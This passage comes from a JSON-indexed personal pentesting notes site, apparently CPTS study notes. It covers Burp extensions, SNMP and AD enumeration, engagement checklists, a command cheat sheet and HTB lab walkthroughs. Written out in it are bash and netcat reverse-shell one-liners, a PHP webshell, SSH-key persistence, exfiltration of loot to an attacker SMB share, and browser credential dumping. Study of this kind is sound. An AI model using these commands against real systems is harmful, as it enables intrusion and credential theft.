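    One way to do this is over SMB (a sketch, assuming Impacket is installed on the attacker machine and 10.10.14.2 is a placeholder for its IP):

    # On the attacker machine: expose the current directory as an SMB share\nimpacket-smbserver share ./ -smb2support\n\n# On the victim (Windows): copy the zip to the attacker's share\ncopy loot.zip \\\\10.10.14.2\\share\\\n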

    3. Import loot.zip into BloodHound.

    # Launch the BloodHound interface.\nbloodhound\n# Enter the user:password already set for the neo4j console.\n

    Click on \"Upload data\". Upload the file.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"braa/","title":"braa - SNMP scanner","text":"","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#installation","title":"Installation","text":"

    Download from the github repo: https://github.com/mteg/braa

    Or install it via apt:

    sudo apt install braa\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#basic-usage","title":"Basic usage","text":"
    braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"browsers-pentesting/","title":"Pentesting Browsers","text":"","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"browsers-pentesting/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

    Tools: mimipenguin, LaZagne.

    Firefox stored credentials:

    ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

    The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

    ","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"burpsuite/","title":"Burpsuite","text":"

    Burp Suite is a Man-in-the-middle (MITM) proxy loaded with valuable tools to help pentesters.

    Related issues:

    Setting up Postman with BurpSuite

    Burp Suite has two editions:

    • Community Edition - Provides you with everything you need to get started and is designed for students or professionals looking to learn more about AppSec. Features include: \u25a0 HTTP(s) Proxy. \u25a0 Modules - Repeater, Decoder, Sequencer & Comparer. \u25a0 Lite version of the Intruder module (Performance Throttling).
    • Professional Edition - Faster, more reliable offering designed for penetration testers and security professionals. Features include everything in the community edition plus: \u25a0 Project files. \u25a0 No performance throttling. \u25a0 Intruder - Fully featured module. \u25a0 Custom PortSwigger payloads. \u25a0 Automatic scanner and crawler.

    Accessing older releases: https://portswigger.net/burp/releases/archive.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#runtime-environments","title":"Runtime environments","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jython-python-environment","title":"Jython: python environment","text":"

    Download from: https://www.jython.org/download.html

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jruby-ruby-environment","title":"JRuby: ruby environment","text":"

    Download from: https://www.jruby.org/download

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#extensions-that-make-your-life-better","title":"Extensions that make your life better","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#autorize","title":"Autorize","text":"

    Autorize is an extension aimed at helping the penetration tester to detect authorization vulnerabilities, one of the more time-consuming tasks in a web application penetration test.

    It is sufficient to give the extension the cookies of a low-privileged user and navigate the website with a high-privileged user. The extension automatically repeats every request with the session of the low-privileged user and detects authorization vulnerabilities.

    It is also possible to repeat every request without any cookies in order to detect authentication vulnerabilities in addition to authorization ones.

    The plugin works without any configuration, but is also highly customizable, allowing configuration of the granularity of the authorization enforcement conditions and also which requests the plugin must test and which not. It is possible to save the state of the plugin and to export a report of the authorization tests in HTML or in CSV.

    The reported enforcement statuses are the following:

    1. Bypassed! - Red color
    2. Enforced! - Green color
    3. Is enforced??? (please configure enforcement detector) - Yellow color
    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#param-miner","title":"Param Miner","text":"

    In Burp Suite, you can use the Param Miner extension's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#turbo-intruder","title":"Turbo intruder","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#cms-scanner","title":"CMS Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-detect","title":"WAF Detect","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#bypass-waf","title":"Bypass WAF","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-cookie-fetcher","title":"Waf Cookie Fetcher","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#pdf-viewer","title":"PDF Viewer","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#wayback-machine","title":"Wayback machine","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#software-vulnerability-scanner","title":"Software Vulnerability Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#php-object-injection-slinger","title":"PHP Object Injection Slinger","text":"

    https://github.com/portswigger/poi-slinger

    This is an extension for Burp Suite Professional, designed to help you scan for PHP Object Injection vulnerabilities on popular PHP Frameworks and some of their dependencies. It will send a serialized PHP Object to the web application designed to force the web server to perform a DNS lookup to a Burp Collaborator Callback Host.

    The payloads for this extension are all from the excellent Ambionics project PHPGGC. PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. You will need it for further exploiting any vulnerabilities found by this extension.

    You should combine your testing with the PHP Object Injection Check extension from Securify so you can identify other possible PHP Object Injection issues that this extension does not pick up.

    To use the extension, on the Proxy/Target/Intruder/Repeater tab, right-click on the desired HTTP request and click Send To POI Slinger. This will also highlight the HTTP request and set the comment Sent to POI Slinger. You can watch the debug messages on the extension's output pane under Extender -> Extensions -> PHP Object Injection Slinger.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jwt-editor","title":"JWT Editor","text":"

    https://github.com/portswigger/jwt-editor

    JWT Editor is a Burp Suite extension for editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs).

    It provides automatic detection and in-line editing of JWTs within HTTP requests/responses and web socket messages, signing and encrypting of tokens and automation of several well-known attacks against JWT implementations.

    It was written originally by Fraser Winterborn, formerly of BlackBerry Security Research Group. The original source code can be found here.

    For further information, check out the repository here.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#java-deserialization-scanner","title":"Java Deserialization Scanner","text":"

    https://github.com/portswigger/java-deserialization-scanner

    This extension gives Burp Suite the ability to find Java deserialization vulnerabilities.

    It adds checks to both the active and passive scanner and can also be used in an \"Intruder like\" manual mode, with a dedicated tab.

    The extension allows the user to discover and exploit Java Deserialization Vulnerabilities with different encodings (Raw, Base64, Ascii Hex, GZIP, Base64 GZIP) when the following libraries are loaded in the target JVM:

    • Apache Commons Collections 3 (up to 3.2.1), with five different chains
    • Apache Commons Collections 4 (up to 4.4.0), with two different chains
    • Spring (up to 4.2.2)
    • Java 6 and Java 7 (up to Jdk7u21) without any weak library
    • Hibernate 5
    • JSON
    • Rome
    • Java 8 (up to Jdk8u20) without any weak library
    • Apache Commons BeanUtils
    • Javassist/Weld
    • JBoss Interceptors
    • Mozilla Rhino (two different chains)
    • Vaadin

    Furthermore, the URLSNDS payload has been introduced to actively detect Java deserialization on the backend without any vulnerable library. This check does the same job as the CPU attack vector already present in the \"Manual testing\" section, but can be safely added to the Burp Suite Active Scanner engine, while the CPU payload should be used with caution.

    After a Java deserialization vulnerability has been found, a dedicated exploitation tab offers a comfortable interface to exploit deserialization vulnerabilities using frohoff's ysoserial: https://github.com/frohoff/ysoserial

    Mini walkthrough: https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"cewl/","title":"cewl - A custom dictionary generator","text":"","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#installation","title":"Installation","text":"

    Preinstalled in Kali Linux.

    Github repo: https://github.com/digininja/CeWL.

    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#basic-commands","title":"Basic commands","text":"
    cewl -m 6 -d 3 --lowercase  URL\n# -d <x>,--depth <x>: Depth to spider to, default 2.\n# -m, --min_word_length: Minimum word length, default 3.\n# --lowercase: save as lowercase\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#examples-from-real-life","title":"Examples from real life","text":"
    cewl domain/path-to-post -w outputfile.txt\n# -w output a list of words to a file.\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cff-explorer/","title":"CFF explorer","text":"

    Created by Erik Pistelli, the Explorer Suite is a freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64: special fields description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker, etc. It was the first PE editor with support for .NET internal structures, and its Resource Editor (Windows Vista icons supported) is capable of handling .NET manifest resources. The suite is available for x86 and x64.

    ","tags":["windows","thick applications"]},{"location":"cff-explorer/#installation","title":"Installation","text":"

    Download from Explorer Suite \u2013 NTCore.

    ","tags":["windows","thick applications"]},{"location":"checksum/","title":"Checksum","text":"","tags":["file integrity","checksum"]},{"location":"checksum/#description","title":"Description","text":"

    A checksum is a small-sized datum from a block of digital data for the purpose of detecting errors which may have been introduced during its transmission or storage.

    Each checksum is generated by a checksum algorithm. Basically, it takes a file as input and outputs the checksum value of that file. There are various algorithms for generating checksums. Here are some of them and the tools employed to generate them:

    Algorithm Tool MD5 md5sum SHA-1 sha1sum SHA-256 sha256sum","tags":["file integrity","checksum"]},{"location":"checksum/#how-to-use-checksum-to-verify-file-integrity","title":"How to use checksum to verify file integrity","text":"

    Go to the directory where the file is stored. Let's suppose we are using MD5 to checksum the file.

    md5sum fileName\n

    As a result, it prints out the MD5 (128-bit) checksum of the file. Usually, when downloading a file, you are given a checksum to compare with the one you can generate from the file. If there is a difference, no matter how small, we can assume the downloaded file has been altered.
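    For example (a sketch with a hypothetical file; the published hash is whatever the download page lists):

    md5sum ubuntu.iso\n# <hash>  ubuntu.iso   <-- compare with the published value\n\n# Or, if the published checksums are stored in a file, let md5sum do the comparison:\nmd5sum -c checksums.md5\n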

    ","tags":["file integrity","checksum"]},{"location":"cloning-a-site/","title":"Tools for cloning a site","text":"

    BeEF.

    Veil

    URLCrazy: URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typo squatting, URL hijacking, phishing, and corporate espionage.

    ","tags":["web pentesting","phishing","tools"]},{"location":"computer-forensic-fundamentals/","title":"Computer Forensic Fundamentals","text":"","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#mbr","title":"MBR","text":"

    The Master Boot Record (MBR) is\u00a0the information in the first sector of a hard disk or a removable drive. It identifies how and where the system's operating system (OS) is located in order to be booted (loaded) into the computer's main storage or random access memory (RAM).

    ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#file-systems","title":"File systems","text":"

    | Windows / floppy disks / USB sticks | FAT12, FAT16/32, NTFS | | Linux (most common) | ext | | Apple/Mac | HFS | | CDs (most common) | ISO 9660, ISO 13490 | | DVDs (most common) | UDF, Joliet |

    ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#usb-sticks","title":"USB sticks","text":"

    Get the serial number and manufacturer information (useful for linking to an OS later).

    First time USB device connected to system (registry key):

    HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\n

    Last time USB device connected to system (registry key):

    HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceClass\n
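    These keys can be inspected from a command prompt on the target with the built-in reg tool (a minimal sketch):

    reg query HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR /s\n# /s: query all subkeys and values recursively\n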
    ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#ftk-imager-a-tool-for-forensic-analysis","title":"FTK imager - A tool for forensic analysis","text":"

    What is it? A tool that quickly assesses electronic evidence by obtaining forensic images of computer data, without making changes to the original evidence.

    ","tags":["forensic"]},{"location":"configuration-files/","title":"Configuration files for some juicy services","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"configuration-files/#exposed-credentials","title":"Exposed Credentials","text":"

    Look for files with read permission and see if they contain any exposed credentials. This is very common with configuration files, log files, and user history files (bash_history in Linux and PSReadLine in Windows).

    /var/www/html/config.php\n
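    A quick way to hunt for such files (a sketch; the paths and patterns are illustrative, adapt them to the target):

    grep -rniE 'password|passwd|secret' /var/www /etc 2>/dev/null | head\n# -r: recursive, -n: show line numbers, -i: case-insensitive, -E: extended regex\n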
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"contract-checklist/","title":"Contract - Checklist","text":"Checkpoint Description \u2610 NDA Non-Disclosure Agreement (NDA) refers to a secrecy contract between the client and the contractor regarding all written or verbal information concerning an order/project. The contractor agrees to treat all confidential information brought to its attention as strictly confidential, even after the order/project is completed. Furthermore, any exceptions to confidentiality, the transferability of rights and obligations, and contractual penalties shall be stipulated in the agreement. The NDA should be signed before the kick-off meeting or at the latest during the meeting before any information is discussed in detail. \u2610 Goals Goals are milestones that must be achieved during the order/project. In this process, goal setting is started with the significant goals and continued with fine-grained and small ones. \u2610 Scope The individual components to be tested are discussed and defined. These may include domains, IP ranges, individual hosts, specific accounts, security systems, etc. Our customers may expect us to find out one or the other point by ourselves. However, the legal basis for testing the individual components has the highest priority here. \u2610 Penetration Testing Type When choosing the type of penetration test, we present the individual options and explain the advantages and disadvantages. Since we already know the goals and scope of our customers, we can and should also make a recommendation on what we advise and justify our recommendation accordingly. Which type is used in the end is the client's decision. \u2610 Methodologies Examples: OSSTMM, OWASP, automated and manual unauthenticated analysis of the internal and external network components, vulnerability assessments of network components and web applications, vulnerability threat vectorization, verification and exploitation, and exploit development to facilitate evasion techniques. \u2610 Penetration Testing Locations External: Remote (via secure VPN) and/or Internal: Internal or Remote (via secure VPN) \u2610 Time Estimation For the time estimation, we need the start and the end date for the penetration test. This gives us a precise time window to perform the test and helps us plan our procedure. It is also vital to explicitly ask how time windows the individual attacks (Exploitation / Post-Exploitation / Lateral Movement) are to be carried out. These can be carried out during or outside regular working hours. When testing outside regular working hours, the focus is more on the security solutions and systems that should withstand our attacks. \u2610 Third Parties For the third parties, it must be determined via which third-party providers our customer obtains services. These can be cloud providers, ISPs, and other hosting providers. Our client must obtain written consent from these providers describing that they agree and are aware that certain parts of their service will be subject to a simulated hacking attack. It is also highly advisable to require the contractor to forward the third-party permission sent to us so that we have actual confirmation that this permission has indeed been obtained. \u2610 Evasive Testing Evasive testing is the test of evading and passing security traffic and security systems in the customer's infrastructure. We look for techniques that allow us to find out information about the internal components and attack them. 
It depends on whether our contractor wants us to use such techniques or not. \u2610 Risks We must also inform our client about the risks involved in the tests and the possible consequences. Based on the risks and their potential severity, we can then set the limitations together and take certain precautions. \u2610 Scope Limitations & Restrictions It is also essential to determine which servers, workstations, or other network components are essential for the client's proper functioning and its customers. We will have to avoid these and must not influence them any further, as this could lead to critical technical errors that could also affect our client's customers in production. \u2610 Information Handling HIPAA, PCI, HITRUST, FISMA/NIST, etc. \u2610 Contact Information For the contact information, we need to create a list of each person's name, title, job title, e-mail address, phone number, office phone number, and an escalation priority order. \u2610 Lines of Communication It should also be documented which communication channels are used to exchange information between the customer and us. This may involve e-mail correspondence, telephone calls, or personal meetings. \u2610 Reporting Apart from the report's structure, any customer-specific requirements the report should contain are also discussed. In addition, we clarify how the reporting is to take place and whether a presentation of the results is desired. \u2610 Payment Terms Finally, prices and the terms of payment are explained.","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"contractor-agreement-checklist/","title":"Contractors Agreement - Checklist for Physical Assessments","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. 
\u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"cpts-index/","title":"CPTS","text":"Number Module My notes Duration 01 Penetration Testing Process Penetration Testing Process 6 hours Introduction 02 Network Enumeration with Nmap (Almost) all about nmap 7 hours Reconnaissance, Enumeration & Attack Planning 03 Footprinting Introduction to footprinting Infrastructure and web enumeration Some services: FTP, SMB, NFS, DNS, SMTP, IMAP/POP3,SNMP, MySQL, Oracle TNS, IPMI, SSH, RSYNC, R Services, RDP, WinRM, WMI 2 days Reconnaissance, Enumeration & Attack Planning 04 Information Gathering - Web Edition Information Gathering - Web Edition. With tools such as Gobuster, ffuf, Burpsuite, Wfuzz, feroxbuster 7 hours Reconnaissance, Enumeration & Attack Planning 05 Vulnerability Assessment Vulnerability Assessment: Nessus, Openvas 2 hours Reconnaissance, Enumeration & Attack Planning 06 File Transfer techniques File Transfer Techniques: Linux, Windows, Code- netcat python php and others, Bypassing file upload restrictions, File encryption, Evading techniques when transferring files, LOLbas Living off the land binaries 3 hours Reconnaissance, Enumeration & Attack Planning 07 Shells & Payloads Bind shells, Reverse shells, Spawn a shell, Web shells (Laudanum and nishang) 2 days Reconnaissance, Enumeration & Attack Planning 08 Using the Metasploit Framework Metasploit, Msfvenom 5 hours Reconnaissance, Enumeration & Attack Planning 09 Password Attacks Password attacks 8 hours Exploitation & Lateral Movement 10 Attacking Common Services Common services: FTP SMB (tools: smbclient, smbmap, rpcclient, Samba Suite, crackmapexec, impacket-smbexec, impacket-psexec), Databases (MySQL and Attacking MySQL, MSSQL and Atacking MSSQL, log4j, RDP, DNS, SMTP 8 hours Exploitation & Lateral Movement 11 Pivoting, Tunneling, and Port Forwarding 2 days Exploitation & Lateral Movement 12 Active Directory Enumeration & Attacks 7 days Exploitation & Lateral Movement 13 Using Web Proxies 8 hours Web Exploitation 14 Attacking Web Applications with Ffuf 5 hours Web Exploitation 15 Login Brute Forcing 6 hours Web Exploitation 16 SQL Injection Fundamentals 8 hours Web Exploitation 17 SQLMap Essentials 8 hours Web Exploitation 18 Cross-Site Scripting (XSS) 6 hours Web Exploitation 19 File Inclusion 8 hours Web Exploitation 20 File Upload Attacks 8 hours Web Exploitation 21 Command Injections 6 hours Web Exploitation 22 Web Attacks 2 days Web Exploitation 23 Attacking Common Applications 4 days Web Exploitation 24 Linux Privilege Escalation 8 hours Post-Exploitation 25 Windows Privilege Escalation 4 days Post-Exploitation 26 Documentation & Reporting 2 days Reporting & Capstone 27 Attacking Enterprise Networks 2 days Reporting & Capstone","tags":["CPTS"]},{"location":"cpts-index/#practicing-steps","title":"Practicing Steps","text":"

    Starting point:

    • 2x Modules: The modules chosen should be categorized according to\u00a0two different difficulties:\u00a0technical\u00a0and\u00a0offensive.
    • 3x Retired Machines: we recommend choosing\u00a0two easy\u00a0and\u00a0one medium\u00a0machines. At the end of each module, you will find recommended retired machines to consider that will help you practice the specific tools and topics covered in the module. These hosts will share one or more attack vectors tied to the module.
    • 5x Active Machines: After building a good foundation with the modules and the retired machines, we can venture to\u00a0two easy,\u00a0two medium, and\u00a0one hard\u00a0active machine. We can also take these from the corresponding module recommendations at the end of each module in Academy.
    • 1x Pro Lab / Endgame: These labs are large multi-host environments that often simulate enterprise networks of varying sizes similar to those we could run into during actual penetration tests for our clients.
    ","tags":["CPTS"]},{"location":"cpts-index/#generic-cheat-sheet","title":"Generic cheat sheet","text":"","tags":["CPTS"]},{"location":"cpts-index/#basic-tools","title":"Basic Tools","text":"Command Description General sudo openvpn user.ovpn Connect to VPN ifconfig/ip a Show our IP address netstat -rn Show networks accessible via the VPN ssh\u00a0user@10.10.10.10 SSH to a remote server ftp 10.129.42.253 FTP to a remote server tmux tmux Start tmux ctrl+b tmux: default prefix prefix c tmux: new window prefix 1 tmux: switch to window (1) prefix shift+% tmux: split pane vertically prefix shift+\" tmux: split pane horizontally prefix -> tmux: switch to the right pane Vim vim file vim: open\u00a0file\u00a0with vim esc+i vim: enter\u00a0insert\u00a0mode esc vim: back to\u00a0normal\u00a0mode x vim: Cut character dw vim: Cut word dd vim: Cut full line yw vim: Copy word yy vim: Copy full line p vim: Paste :1 vim: Go to line number 1. :w vim: Write the file 'i.e. save' :q vim: Quit :q! vim: Quit without saving :wq vim: Write and quit","tags":["CPTS"]},{"location":"cpts-index/#pentesting","title":"Pentesting","text":"Command Description Service Scanning nmap 10.129.42.253 Run nmap on an IP nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP locate scripts/citrix List various available nmap scripts nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP netcat 10.10.10.10 22 Grab banner of an open port smbclient -N -L \\\\\\\\10.129.42.253 List SMB Shares smbclient \\\\\\\\10.129.42.253\\\\users Connect to an SMB share snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string Web Enumeration gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website curl -IL https://www.inlanefreight.com Grab website banner whatweb 10.10.10.121 List details about the webserver/certificates curl 10.10.10.121/robots.txt List potential directories in\u00a0robots.txtctrl+U View page source (in Firefox) Public Exploits searchsploit openssh 7.2 Search for public exploits for a web application msfconsole MSF: Start the Metasploit Framework search exploit eternalblue MSF: Search for public exploits in MSF use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module show options MSF: Show required options for an MSF module set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option check MSF: Test if the target server is vulnerable exploit MSF: Run the exploit on the target server is vulnerable Using Shells nc -lvnp 1234 Start a\u00a0nc\u00a0listener on a local port bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/sh -i 2>&1\\|nc 10.10.10.10 1234 >/tmp/f Another command to send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/bash -i 2>&1\\|nc -lvp 1234 >/tmp/f Start a bind shell on the remote server nc 10.10.10.1 1234 Connect to a bind shell started on the remote server python -c 'import pty; pty.spawn(\"/bin/bash\")' Upgrade shell TTY (1) ctrl+z\u00a0then\u00a0stty raw -echo\u00a0then\u00a0fg\u00a0then\u00a0enter\u00a0twice Upgrade shell TTY (2) echo \"<?php system(\\$_GET['cmd']);?>\" > /var/www/html/shell.php Create a webshell php file curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command 
on an uploaded webshell Privilege Escalation ./linpeas.sh Run\u00a0linpeas\u00a0script to enumerate remote server sudo -l List available\u00a0sudo\u00a0privileges sudo -u user /bin/echo Hello World! Run a command with\u00a0sudosudo su - Switch to root user (if we have access to\u00a0sudo su) sudo su user - Switch to a user (if we have access to\u00a0sudo su) ssh-keygen -f key Create a new SSH key echo \"ssh-rsa AAAAB...SNIP...M= user@parrot\" >> /root/.ssh/authorized_keys Add the generated public key to the user ssh\u00a0root@10.10.10.10\u00a0-i key SSH to the server with the generated private key Transferring Files python3 -m http.server 8000 Start a local webserver wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with\u00a0scp\u00a0(requires SSH access) base64 shell -w 0 Convert a file to\u00a0base64echo f0VMR...SNIO...InmDwU \\| base64 -d > shell Convert a file from\u00a0base64\u00a0back to its orig md5sum shell Check the file's\u00a0md5sum\u00a0to ensure it converted correctly","tags":["CPTS"]},{"location":"cpts-labs/","title":"Lab resolution","text":""},{"location":"cpts-labs/#service-scanning","title":"Service scanning","text":"

    Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?

    sudo nmap -sC -sV -p8080 $ip \n

    Results: Apache Tomcat

    Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

    sudo nmap -sC -sV $ip\n

    Results: 2323

    List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

    smbclient \\\\\\\\10.129.125.178\\\\users -U bob\n# password: Welcome1 (provided in the exercise description)\n\nsmb>dir\nsmb>cd flag\nsmb>get flag.txt\nsmb>quit\ncat flag.txt\n

    Results: dceece590f3284c3866305eb2473d099

    "},{"location":"cpts-labs/#web-enumeration","title":"Web Enumeration","text":"

    Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

    dirb http://94.237.55.246:55655/    \n# From enumeration you can get to dirb http://94.237.55.246:55655/robots.txt\n

    Go to http://94.237.55.246:55655/robots.txt and you will notice http://94.237.55.246:55655/admin-login-page.php

    Visit it and, hardcoded in the page source, you will see:

                    <!-- TODO: remove test credentials admin:password123 -->\n

    Log in to the app.

    Results: HTB{w3b_3num3r4710n_r3v34l5_53cr375}

    "},{"location":"cpts-labs/#public-exploits","title":"Public Exploits","text":"

    Access to the web app at http://ip:36883

    The title of the WordPress post is \"Simple Backup Plugin 2.7.10\", which is a well-known vulnerable plugin.

    searchsploit Simple Backup Plugin 2.7.10\n
    ----------------------------------------------------------- ---------------------------------\n Exploit Title                                             |  Path\n----------------------------------------------------------- ---------------------------------\nSimple Backup Plugin Python Exploit 2.7.10 - Path Traversa | php/webapps/51937.txt\n----------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n
    sudo cp /usr/share/exploitdb/exploits/php/webapps/51937.txt .\nmv 51937.txt 51937.py\nchmod +x 51937.py\npython ./51937.py http://83.136.255.162:36883/ \"/flag.txt\" 4\n#  target_url = sys.argv[1]\n#  file_name = sys.argv[2]\n#  depth = int(sys.argv[3])\n

    Results: HTB{my_f1r57_h4ck}

    "},{"location":"cpts-labs/#privilege-escalation","title":"Privilege Escalation","text":"

    SSH to $ip with user \"user1\" and password \"password1\". SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

    ssh user1@$ip -p 31459\n# password1\n\nsudo -l\n# User user1 may run the following commands on\n#        ng-644144-gettingstartedprivesc-udbk3-5969ffb656-cp248:\n#    (user2 : user2) NOPASSWD: /bin/bash\n\n# One way (note the quotes: an unquoted # would start a comment and write nothing)\necho '#!/bin/bash' > lala.sh\necho 'cat /home/user2/flag.txt' >> lala.sh\nchmod +x lala.sh\nsudo -u user2  /bin/bash lala.sh\n\n# Another\nsudo -u user2 /bin/bash -i\n

    Results: HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

    Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

    Once you are user2, go to /root:

    cd /root\nls -la\n
    drwxr-x--- 1 root user2 4096 Feb 12  2021 .\ndrwxr-xr-x 1 root root  4096 Jun  3 19:21 ..\n-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history\n-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc\n-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile\ndrwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh\n-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo\n-rw------- 1 root root    33 Feb 12  2021 flag.txt\n

    So we have read access to the .ssh folder. We can access and copy the private key:

    cd .ssh\ncat id_rsa\n
    -----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n....\nQfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==\n-----END OPENSSH PRIVATE KEY-----\n

    On our attacker machine, we save that id_rsa key in our folder:

    echo \"the key\" > id_rsa\n
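    SSH refuses private keys with permissive file permissions, so restrict them first:

    chmod 600 id_rsa\n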

    And now we can log in as root:

    ssh root@$ip -p 31459 -i id_rsa\n

    And cat the flag:

    cat /root/flag.txt \n

    Results: HTB{pr1v1l363_35c4l4710n_2_r007}

    "},{"location":"cpts-labs/#nibbles-enumeration","title":"Nibbles - Enumeration","text":"

    Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)

    sudo nmap -sC -sV $ip\n

    Results: 2.4.18

    "},{"location":"cpts-labs/#nibbles-web-footprinting","title":"Nibbles - Web Footprinting","text":"


    "},{"location":"crackmapexec/","title":"CrackMapExec","text":"

    Once we have access to a domain, CrackMapExec (CME) allows us to sweep the network and see which users and machines we can access.

    CME allows us to authenticate ourselves with the following protocols:

